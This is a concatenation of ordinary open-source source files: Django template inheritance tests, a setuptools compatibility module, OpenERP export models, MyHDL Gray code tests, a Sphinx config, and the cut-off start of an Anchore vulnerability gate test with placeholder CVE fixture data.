cycleTime = cycleTimeOverride if cycleTimeOverride is not None else self.cycleTime
dpsFactor = 1 / (cycleTime / 1000)
dps = DmgTypes(
em=volley.em * dpsFactor,
thermal=volley.thermal * dpsFactor,
kinetic=volley.kinetic * dpsFactor,
explosive=volley.explosive * dpsFactor)
return dps
def clear(self):
pass
| gpl-3.0 |
jallohm/django | tests/template_tests/syntax_tests/test_extends.py | 83 | 15481 | from django.test import SimpleTestCase
from ..utils import setup
inheritance_templates = {
'inheritance01': "1{% block first %}&{% endblock %}3{% block second %}_{% endblock %}",
'inheritance02': "{% extends 'inheritance01' %}"
"{% block first %}2{% endblock %}{% block second %}4{% endblock %}",
'inheritance03': "{% extends 'inheritance02' %}",
'inheritance04': "{% extends 'inheritance01' %}",
'inheritance05': "{% extends 'inheritance02' %}",
'inheritance06': "{% extends foo %}",
'inheritance07': "{% extends 'inheritance01' %}{% block second %}5{% endblock %}",
'inheritance08': "{% extends 'inheritance02' %}{% block second %}5{% endblock %}",
'inheritance09': "{% extends 'inheritance04' %}",
'inheritance10': "{% extends 'inheritance04' %} ",
'inheritance11': "{% extends 'inheritance04' %}"
"{% block first %}2{% endblock %}{% block second %}4{% endblock %}",
'inheritance12': "{% extends 'inheritance07' %}{% block first %}2{% endblock %}",
'inheritance13': "{% extends 'inheritance02' %}"
"{% block first %}a{% endblock %}{% block second %}b{% endblock %}",
'inheritance14': "{% extends 'inheritance01' %}{% block newblock %}NO DISPLAY{% endblock %}",
'inheritance15': "{% extends 'inheritance01' %}"
"{% block first %}2{% block inner %}inner{% endblock %}{% endblock %}",
'inheritance16': "{% extends 'inheritance15' %}{% block inner %}out{% endblock %}",
'inheritance17': "{% load testtags %}{% block first %}1234{% endblock %}",
'inheritance18': "{% load testtags %}{% echo this that theother %}5678",
'inheritance19': "{% extends 'inheritance01' %}"
"{% block first %}{% load testtags %}{% echo 400 %}5678{% endblock %}",
'inheritance20': "{% extends 'inheritance01' %}{% block first %}{{ block.super }}a{% endblock %}",
'inheritance21': "{% extends 'inheritance02' %}{% block first %}{{ block.super }}a{% endblock %}",
'inheritance22': "{% extends 'inheritance04' %}{% block first %}{{ block.super }}a{% endblock %}",
'inheritance23': "{% extends 'inheritance20' %}{% block first %}{{ block.super }}b{% endblock %}",
'inheritance24': "{% extends context_template %}"
"{% block first %}2{% endblock %}{% block second %}4{% endblock %}",
'inheritance25': "{% extends context_template.1 %}"
"{% block first %}2{% endblock %}{% block second %}4{% endblock %}",
'inheritance26': "no tags",
'inheritance27': "{% extends 'inheritance26' %}",
'inheritance 28': "{% block first %}!{% endblock %}",
'inheritance29': "{% extends 'inheritance 28' %}",
'inheritance30': "1{% if optional %}{% block opt %}2{% endblock %}{% endif %}3",
'inheritance31': "{% extends 'inheritance30' %}{% block opt %}two{% endblock %}",
'inheritance32': "{% extends 'inheritance30' %}{% block opt %}two{% endblock %}",
'inheritance33': "1{% if optional == 1 %}{% block opt %}2{% endblock %}{% endif %}3",
'inheritance34': "{% extends 'inheritance33' %}{% block opt %}two{% endblock %}",
'inheritance35': "{% extends 'inheritance33' %}{% block opt %}two{% endblock %}",
'inheritance36': "{% for n in numbers %}_{% block opt %}{{ n }}{% endblock %}{% endfor %}_",
'inheritance37': "{% extends 'inheritance36' %}{% block opt %}X{% endblock %}",
'inheritance38': "{% extends 'inheritance36' %}{% block opt %}X{% endblock %}",
'inheritance39': "{% extends 'inheritance30' %}{% block opt %}new{{ block.super }}{% endblock %}",
'inheritance40': "{% extends 'inheritance33' %}{% block opt %}new{{ block.super }}{% endblock %}",
'inheritance41': "{% extends 'inheritance36' %}{% block opt %}new{{ block.super }}{% endblock %}",
'inheritance42': "{% extends 'inheritance02'|cut:' ' %}",
}
class InheritanceTests(SimpleTestCase):
libraries = {'testtags': 'template_tests.templatetags.testtags'}
@setup(inheritance_templates)
def test_inheritance01(self):
"""
Standard template with no inheritance
"""
output = self.engine.render_to_string('inheritance01')
self.assertEqual(output, '1&3_')
@setup(inheritance_templates)
def test_inheritance02(self):
"""
Standard two-level inheritance
"""
output = self.engine.render_to_string('inheritance02')
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance03(self):
"""
Three-level with no redefinitions on third level
"""
output = self.engine.render_to_string('inheritance03')
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance04(self):
"""
Two-level with no redefinitions on second level
"""
output = self.engine.render_to_string('inheritance04')
self.assertEqual(output, '1&3_')
@setup(inheritance_templates)
def test_inheritance05(self):
"""
Two-level with double quotes instead of single quotes
"""
output = self.engine.render_to_string('inheritance05')
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance06(self):
"""
Three-level with variable parent-template name
"""
output = self.engine.render_to_string('inheritance06', {'foo': 'inheritance02'})
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance07(self):
"""
Two-level with one block defined, one block not defined
"""
output = self.engine.render_to_string('inheritance07')
self.assertEqual(output, '1&35')
@setup(inheritance_templates)
def test_inheritance08(self):
"""
Three-level with one block defined on this level, two blocks
defined next level
"""
output = self.engine.render_to_string('inheritance08')
self.assertEqual(output, '1235')
@setup(inheritance_templates)
def test_inheritance09(self):
"""
Three-level with second and third levels blank
"""
output = self.engine.render_to_string('inheritance09')
self.assertEqual(output, '1&3_')
@setup(inheritance_templates)
def test_inheritance10(self):
"""
Three-level with space NOT in a block -- should be ignored
"""
output = self.engine.render_to_string('inheritance10')
self.assertEqual(output, '1&3_')
@setup(inheritance_templates)
def test_inheritance11(self):
"""
Three-level with both blocks defined on this level, but none on
second level
"""
output = self.engine.render_to_string('inheritance11')
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance12(self):
"""
Three-level with this level providing one and second level
providing the other
"""
output = self.engine.render_to_string('inheritance12')
self.assertEqual(output, '1235')
@setup(inheritance_templates)
def test_inheritance13(self):
"""
Three-level with this level overriding second level
"""
output = self.engine.render_to_string('inheritance13')
self.assertEqual(output, '1a3b')
@setup(inheritance_templates)
def test_inheritance14(self):
"""
A block defined only in a child template shouldn't be displayed
"""
output = self.engine.render_to_string('inheritance14')
self.assertEqual(output, '1&3_')
@setup(inheritance_templates)
def test_inheritance15(self):
"""
A block within another block
"""
output = self.engine.render_to_string('inheritance15')
self.assertEqual(output, '12inner3_')
@setup(inheritance_templates)
def test_inheritance16(self):
"""
A block within another block (level 2)
"""
output = self.engine.render_to_string('inheritance16')
self.assertEqual(output, '12out3_')
@setup(inheritance_templates)
def test_inheritance17(self):
"""
{% load %} tag (parent -- setup for exception04)
"""
output = self.engine.render_to_string('inheritance17')
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance18(self):
"""
{% load %} tag (standard usage, without inheritance)
"""
output = self.engine.render_to_string('inheritance18')
self.assertEqual(output, 'this that theother5678')
@setup(inheritance_templates)
def test_inheritance19(self):
"""
{% load %} tag (within a child template)
"""
output = self.engine.render_to_string('inheritance19')
self.assertEqual(output, '140056783_')
@setup(inheritance_templates)
def test_inheritance20(self):
"""
Two-level inheritance with {{ block.super }}
"""
output = self.engine.render_to_string('inheritance20')
self.assertEqual(output, '1&a3_')
@setup(inheritance_templates)
def test_inheritance21(self):
"""
Three-level inheritance with {{ block.super }} from parent
"""
output = self.engine.render_to_string('inheritance21')
self.assertEqual(output, '12a34')
@setup(inheritance_templates)
def test_inheritance22(self):
"""
Three-level inheritance with {{ block.super }} from grandparent
"""
output = self.engine.render_to_string('inheritance22')
self.assertEqual(output, '1&a3_')
@setup(inheritance_templates)
def test_inheritance23(self):
"""
Three-level inheritance with {{ block.super }} from parent and
grandparent
"""
output = self.engine.render_to_string('inheritance23')
self.assertEqual(output, '1&ab3_')
@setup(inheritance_templates)
def test_inheritance24(self):
"""
Inheritance from local context without use of template loader
"""
context_template = self.engine.from_string("1{% block first %}_{% endblock %}3{% block second %}_{% endblock %}")
output = self.engine.render_to_string('inheritance24', {'context_template': context_template})
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance25(self):
"""
Inheritance from local context with variable parent template
"""
context_template = [
self.engine.from_string("Wrong"),
self.engine.from_string("1{% block first %}_{% endblock %}3{% block second %}_{% endblock %}"),
]
output = self.engine.render_to_string('inheritance25', {'context_template': context_template})
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance26(self):
"""
Set up a base template to extend
"""
output = self.engine.render_to_string('inheritance26')
self.assertEqual(output, 'no tags')
@setup(inheritance_templates)
def test_inheritance27(self):
"""
Inheritance from a template that doesn't have any blocks
"""
output = self.engine.render_to_string('inheritance27')
self.assertEqual(output, 'no tags')
@setup(inheritance_templates)
def test_inheritance_28(self):
"""
Set up a base template with a space in it.
"""
output = self.engine.render_to_string('inheritance 28')
self.assertEqual(output, '!')
@setup(inheritance_templates)
def test_inheritance29(self):
"""
Inheritance from a template with a space in its name should work.
"""
output = self.engine.render_to_string('inheritance29')
self.assertEqual(output, '!')
@setup(inheritance_templates)
def test_inheritance30(self):
"""
Base template, putting block in a conditional {% if %} tag
"""
output = self.engine.render_to_string('inheritance30', {'optional': True})
self.assertEqual(output, '123')
# Inherit from a template with block wrapped in an {% if %} tag
# (in parent), still gets overridden
@setup(inheritance_templates)
def test_inheritance31(self):
output = self.engine.render_to_string('inheritance31', {'optional': True})
self.assertEqual(output, '1two3')
@setup(inheritance_templates)
def test_inheritance32(self):
output = self.engine.render_to_string('inheritance32')
self.assertEqual(output, '13')
@setup(inheritance_templates)
def test_inheritance33(self):
"""
Base template, putting block in a conditional {% if %} tag
"""
output = self.engine.render_to_string('inheritance33', {'optional': 1})
self.assertEqual(output, '123')
@setup(inheritance_templates)
def test_inheritance34(self):
"""
Inherit from a template with block wrapped in an {% if %} tag
(in parent), still gets overridden
"""
output = self.engine.render_to_string('inheritance34', {'optional': 1})
self.assertEqual(output, '1two3')
@setup(inheritance_templates)
def test_inheritance35(self):
"""
Inherit from a template with block wrapped in an {% if %} tag
(in parent), still gets overridden
"""
output = self.engine.render_to_string('inheritance35', {'optional': 2})
self.assertEqual(output, '13')
@setup(inheritance_templates)
def test_inheritance36(self):
"""
Base template, putting block in a {% for %} tag
"""
output = self.engine.render_to_string('inheritance36', {'numbers': '123'})
self.assertEqual(output, '_1_2_3_')
@setup(inheritance_templates)
def test_inheritance37(self):
"""
Inherit from a template with block wrapped in an {% for %} tag
(in parent), still gets overridden
"""
output = self.engine.render_to_string('inheritance37', {'numbers': '123'})
self.assertEqual(output, '_X_X_X_')
@setup(inheritance_templates)
def test_inheritance38(self):
"""
Inherit from a template with block wrapped in an {% for %} tag
(in parent), still gets overridden
"""
output = self.engine.render_to_string('inheritance38')
self.assertEqual(output, '_')
# The super block will still be found.
@setup(inheritance_templates)
def test_inheritance39(self):
output = self.engine.render_to_string('inheritance39', {'optional': True})
self.assertEqual(output, '1new23')
@setup(inheritance_templates)
def test_inheritance40(self):
output = self.engine.render_to_string('inheritance40', {'optional': 1})
self.assertEqual(output, '1new23')
@setup(inheritance_templates)
def test_inheritance41(self):
output = self.engine.render_to_string('inheritance41', {'numbers': '123'})
self.assertEqual(output, '_new1_new2_new3_')
@setup(inheritance_templates)
def test_inheritance42(self):
"""
Expression starting and ending with a quote
"""
output = self.engine.render_to_string('inheritance42')
self.assertEqual(output, '1234')
| bsd-3-clause |
adobecs5/urp2015 | lib/python3.4/site-packages/setuptools/compat.py | 456 | 2094 | import sys
import itertools
PY3 = sys.version_info >= (3,)
PY2 = not PY3
if PY2:
basestring = basestring
import __builtin__ as builtins
import ConfigParser
from StringIO import StringIO
BytesIO = StringIO
func_code = lambda o: o.func_code
func_globals = lambda o: o.func_globals
im_func = lambda o: o.im_func
from htmlentitydefs import name2codepoint
import httplib
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
from BaseHTTPServer import BaseHTTPRequestHandler
iteritems = lambda o: o.iteritems()
long_type = long
maxsize = sys.maxint
unichr = unichr
unicode = unicode
bytes = str
from urllib import url2pathname, splittag, pathname2url
import urllib2
from urllib2 import urlopen, HTTPError, URLError, unquote, splituser
from urlparse import urlparse, urlunparse, urljoin, urlsplit, urlunsplit
filterfalse = itertools.ifilterfalse
exec("""def reraise(tp, value, tb=None):
raise tp, value, tb""")
if PY3:
basestring = str
import builtins
import configparser as ConfigParser
from io import StringIO, BytesIO
func_code = lambda o: o.__code__
func_globals = lambda o: o.__globals__
im_func = lambda o: o.__func__
from html.entities import name2codepoint
import http.client as httplib
from http.server import HTTPServer, SimpleHTTPRequestHandler
from http.server import BaseHTTPRequestHandler
iteritems = lambda o: o.items()
long_type = int
maxsize = sys.maxsize
unichr = chr
unicode = str
bytes = bytes
from urllib.error import HTTPError, URLError
import urllib.request as urllib2
from urllib.request import urlopen, url2pathname, pathname2url
from urllib.parse import (
urlparse, urlunparse, unquote, splituser, urljoin, urlsplit,
urlunsplit, splittag,
)
filterfalse = itertools.filterfalse
def reraise(tp, value, tb=None):
if value.__traceback__ is not tb:
raise value.with_traceback(tb)
raise value
| apache-2.0 |
pgleeson/TestArea | lib/jython/Lib/test/test_cl.py | 31 | 3929 | #! /usr/bin/env python
"""Whimpy test script for the cl module
Roger E. Masse
"""
import cl
from test.test_support import verbose
clattrs = ['ADDED_ALGORITHM_ERROR', 'ALAW', 'ALGORITHM_ID',
'ALGORITHM_VERSION', 'AUDIO', 'AWARE_ERROR', 'AWARE_MPEG_AUDIO',
'AWARE_MULTIRATE', 'AWCMP_CONST_QUAL', 'AWCMP_FIXED_RATE',
'AWCMP_INDEPENDENT', 'AWCMP_JOINT_STEREO', 'AWCMP_LOSSLESS',
'AWCMP_MPEG_LAYER_I', 'AWCMP_MPEG_LAYER_II', 'AWCMP_STEREO',
'Algorithm', 'AlgorithmNumber', 'AlgorithmType', 'AudioFormatName',
'BAD_ALGORITHM_NAME', 'BAD_ALGORITHM_TYPE', 'BAD_BLOCK_SIZE',
'BAD_BOARD', 'BAD_BUFFERING', 'BAD_BUFFERLENGTH_NEG',
'BAD_BUFFERLENGTH_ODD', 'BAD_BUFFER_EXISTS', 'BAD_BUFFER_HANDLE',
'BAD_BUFFER_POINTER', 'BAD_BUFFER_QUERY_SIZE', 'BAD_BUFFER_SIZE',
'BAD_BUFFER_SIZE_POINTER', 'BAD_BUFFER_TYPE',
'BAD_COMPRESSION_SCHEME', 'BAD_COMPRESSOR_HANDLE',
'BAD_COMPRESSOR_HANDLE_POINTER', 'BAD_FRAME_SIZE',
'BAD_FUNCTIONALITY', 'BAD_FUNCTION_POINTER', 'BAD_HEADER_SIZE',
'BAD_INITIAL_VALUE', 'BAD_INTERNAL_FORMAT', 'BAD_LICENSE',
'BAD_MIN_GT_MAX', 'BAD_NO_BUFFERSPACE', 'BAD_NUMBER_OF_BLOCKS',
'BAD_PARAM', 'BAD_PARAM_ID_POINTER', 'BAD_PARAM_TYPE', 'BAD_POINTER',
'BAD_PVBUFFER', 'BAD_SCHEME_POINTER', 'BAD_STREAM_HEADER',
'BAD_STRING_POINTER', 'BAD_TEXT_STRING_PTR', 'BEST_FIT',
'BIDIRECTIONAL', 'BITRATE_POLICY', 'BITRATE_TARGET',
'BITS_PER_COMPONENT', 'BLENDING', 'BLOCK_SIZE', 'BOTTOM_UP',
'BUFFER_NOT_CREATED', 'BUF_DATA', 'BUF_FRAME', 'BytesPerPixel',
'BytesPerSample', 'CHANNEL_POLICY', 'CHROMA_THRESHOLD', 'CODEC',
'COMPONENTS', 'COMPRESSED_BUFFER_SIZE', 'COMPRESSION_RATIO',
'COMPRESSOR', 'CONTINUOUS_BLOCK', 'CONTINUOUS_NONBLOCK',
'CompressImage', 'DATA', 'DECOMPRESSOR', 'DecompressImage',
'EDGE_THRESHOLD', 'ENABLE_IMAGEINFO', 'END_OF_SEQUENCE', 'ENUM_VALUE',
'EXACT_COMPRESSION_RATIO', 'EXTERNAL_DEVICE', 'FLOATING_ENUM_VALUE',
'FLOATING_RANGE_VALUE', 'FRAME', 'FRAME_BUFFER_SIZE',
'FRAME_BUFFER_SIZE_ZERO', 'FRAME_RATE', 'FRAME_TYPE', 'G711_ALAW',
'G711_ULAW', 'GRAYSCALE', 'GetAlgorithmName', 'HDCC',
'HDCC_SAMPLES_PER_TILE', 'HDCC_TILE_THRESHOLD', 'HEADER_START_CODE',
'IMAGE_HEIGHT', 'IMAGE_WIDTH', 'INTERNAL_FORMAT',
'INTERNAL_IMAGE_HEIGHT', 'INTERNAL_IMAGE_WIDTH', 'INTRA', 'JPEG',
'JPEG_ERROR', 'JPEG_NUM_PARAMS', 'JPEG_QUALITY_FACTOR',
'JPEG_QUANTIZATION_TABLES', 'JPEG_SOFTWARE', 'JPEG_STREAM_HEADERS',
'KEYFRAME', 'LAST_FRAME_INDEX', 'LAYER', 'LUMA_THRESHOLD',
'MAX_NUMBER_OF_AUDIO_ALGORITHMS', 'MAX_NUMBER_OF_ORIGINAL_FORMATS',
'MAX_NUMBER_OF_PARAMS', 'MAX_NUMBER_OF_VIDEO_ALGORITHMS', 'MONO',
'MPEG_VIDEO', 'MVC1', 'MVC2', 'MVC2_BLENDING', 'MVC2_BLENDING_OFF',
'MVC2_BLENDING_ON', 'MVC2_CHROMA_THRESHOLD', 'MVC2_EDGE_THRESHOLD',
'MVC2_ERROR', 'MVC2_LUMA_THRESHOLD', 'NEXT_NOT_AVAILABLE',
'NOISE_MARGIN', 'NONE', 'NUMBER_OF_FRAMES', 'NUMBER_OF_PARAMS',
'ORIENTATION', 'ORIGINAL_FORMAT', 'OpenCompressor',
'OpenDecompressor', 'PARAM_OUT_OF_RANGE', 'PREDICTED', 'PREROLL',
'ParamID', 'ParamNumber', 'ParamType', 'QUALITY_FACTOR',
'QUALITY_LEVEL', 'QueryAlgorithms', 'QueryMaxHeaderSize',
'QueryScheme', 'QuerySchemeFromName', 'RANGE_VALUE', 'RGB', 'RGB332',
'RGB8', 'RGBA', 'RGBX', 'RLE', 'RLE24', 'RTR', 'RTR1',
'RTR_QUALITY_LEVEL', 'SAMPLES_PER_TILE', 'SCHEME_BUSY',
'SCHEME_NOT_AVAILABLE', 'SPEED', 'STEREO_INTERLEAVED',
'STREAM_HEADERS', 'SetDefault', 'SetMax', 'SetMin', 'TILE_THRESHOLD',
'TOP_DOWN', 'ULAW', 'UNCOMPRESSED', 'UNCOMPRESSED_AUDIO',
'UNCOMPRESSED_VIDEO', 'UNKNOWN_SCHEME', 'VIDEO', 'VideoFormatName',
'Y', 'YCbCr', 'YCbCr422', 'YCbCr422DC', 'YCbCr422HC', 'YUV', 'YUV422',
'YUV422DC', 'YUV422HC', '__doc__', '__name__', 'cvt_type', 'error']
# This is a very inobtrusive test for the existence of the cl
# module and all its attributes.
def main():
# touch all the attributes of al without doing anything
if verbose:
print 'Touching cl module attributes...'
for attr in clattrs:
if verbose:
print 'touching: ', attr
getattr(cl, attr)
main()
| gpl-2.0 |
vrenaville/ngo-addons-backport | openerp/addons/base/ir/ir_exports.py | 72 | 1721 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields,osv
class ir_exports(osv.osv):
_name = "ir.exports"
_order = 'name'
_columns = {
'name': fields.char('Export Name', size=128),
'resource': fields.char('Resource', size=128, select=True),
'export_fields': fields.one2many('ir.exports.line', 'export_id',
'Export ID'),
}
ir_exports()
class ir_exports_line(osv.osv):
_name = 'ir.exports.line'
_order = 'id'
_columns = {
'name': fields.char('Field Name', size=64),
'export_id': fields.many2one('ir.exports', 'Export', select=True, ondelete='cascade'),
}
ir_exports_line()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
josyb/myhdl | cosimulation/test/test_bin2gray.py | 4 | 2691 | import unittest
from unittest import TestCase
from myhdl import Simulation, Signal, delay, intbv, bin
from bin2gray import bin2gray
MAX_WIDTH = 10
def nextLn(Ln):
""" Return Gray code Ln+1, given Ln. """
Ln0 = ['0' + codeword for codeword in Ln]
Ln1 = ['1' + codeword for codeword in Ln]
Ln1.reverse()
return Ln0 + Ln1
class TestOriginalGrayCode(TestCase):
def testOriginalGrayCode(self):
""" Check that the code is an original Gray code """
Rn = []
def stimulus(B, G, n):
for i in range(2**n):
B.next = intbv(i)
yield delay(10)
Rn.append(bin(G, width=n))
Ln = ['0', '1'] # n == 1
for n in range(2, MAX_WIDTH):
Ln = nextLn(Ln)
del Rn[:]
B = Signal(intbv(1))
G = Signal(intbv(0))
dut = bin2gray(B, G, n)
stim = stimulus(B, G, n)
sim = Simulation(dut, stim)
sim.run(quiet=1)
self.assertEqual(Ln, Rn)
class TestGrayCodeProperties(TestCase):
def testSingleBitChange(self):
""" Check that only one bit changes in successive codewords """
def test(B, G, G_Z, width):
B.next = intbv(0)
yield delay(10)
for i in range(1, 2**width):
G_Z.next = G
B.next = intbv(i)
yield delay(10)
diffcode = bin(G ^ G_Z)
self.assertEqual(diffcode.count('1'), 1)
for width in range(2, MAX_WIDTH):
B = Signal(intbv(1))
G = Signal(intbv(0))
G_Z = Signal(intbv(0))
dut = bin2gray(B, G, width)
check = test(B, G, G_Z, width)
sim = Simulation(dut, check)
sim.run(quiet=1)
def testUniqueCodeWords(self):
""" Check that all codewords occur exactly once """
def test(B, G, width):
actual = []
for i in range(2**width):
B.next = intbv(i)
yield delay(10)
actual.append(int(G))
actual.sort()
expected = list(range(2**width))
self.assertEqual(actual, expected)
for width in range(1, MAX_WIDTH):
B = Signal(intbv(1))
G = Signal(intbv(0))
dut = bin2gray(B, G, width)
check = test(B, G, width)
sim = Simulation(dut, check)
sim.run(quiet=1)
if __name__ == '__main__':
unittest.main()
| lgpl-2.1 |
openstack/futurist | releasenotes/source/conf.py | 1 | 8555 | # -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'openstackdocstheme',
'reno.sphinxext',
]
# openstackdocstheme options
openstackdocs_repo_name = 'openstack/futurist'
openstackdocs_bug_project = 'futurist'
openstackdocs_bug_tag = ''
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
copyright = '2016, futurist Developers'
# Release notes do not need a version number in the title, they
# cover multiple releases.
# The full version, including alpha/beta/rc tags.
release = ''
# The short X.Y version.
version = ''
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'native'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'openstackdocs'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'futuristReleaseNotesDoc'
# -- Options for LaTeX output ---------------------------------------------
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'futuristReleaseNotes.tex',
'futurist Release Notes Documentation',
'futurist Developers', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'futuristReleaseNotes',
'futurist Release Notes Documentation',
['futurist Developers'], 1)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'futuristReleaseNotes',
'futurist Release Notes Documentation',
'futurist Developers', 'futuristReleaseNotes',
'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
# -- Options for Internationalization output ------------------------------
locale_dirs = ['locale/']
| apache-2.0 |
anchore/anchore-engine | tests/integration/services/policy_engine/engine/policy/gates/test_vulnerabilities.py | 1 | 5979 | import pytest
from anchore_engine.services.policy_engine.engine.policy.gates.vulnerabilities import (
VulnerabilitiesGate,
UnsupportedDistroTrigger,
FeedOutOfDateTrigger,
VulnerabilityMatchTrigger,
)
from anchore_engine.db import Image, get_thread_scoped_session
from tests.integration.services.policy_engine.engine.policy.gates import GateUnitTest
from anchore_engine.subsys import logger
from tests.integration.services.policy_engine.engine.policy.gates import (
cls_fully_loaded_test_env,
cls_no_feeds_test_env,
)
logger.enable_test_logging()
@pytest.mark.usefixtures("cls_fully_loaded_test_env")
class AnchoreSecGateTest(GateUnitTest):
"""
Test against the debian 8 based "node" image in the test env.
It contains the package:
mercurial 3.1.2-2+deb8u3
Vuln data for testing:
[
{
"Vulnerability": {
"FixedIn": [
{
"VersionFormat": "dpkg",
"NamespaceName": "debian:8",
"Version": "None",
"Name": "mercurial"
}
],
"NamespaceName": "debian:8",
"Link": "https://fake.cve.testing/tracker/CVE-TEST-TEST0",
"Name": "CVE-TEST-TEST0",
"Severity": "Low"
}
},
{
"Vulnerability": {
"FixedIn": [
{
"VersionFormat": "dpkg",
"NamespaceName": "debian:8",
"Version": "3.1.2-2+deb8u3",
"Name": "mercurial"
}
],
"NamespaceName": "debian:8",
"Link": "https://fake.cve.testing/tracker/CVE-TEST-TEST1",
"Name": "CVE-TEST-TEST1",
"Severity": "Medium"
}
},
{
"Vulnerability": {
"FixedIn": [
{
"VersionFormat": "dpkg",
"NamespaceName": "debian:8",
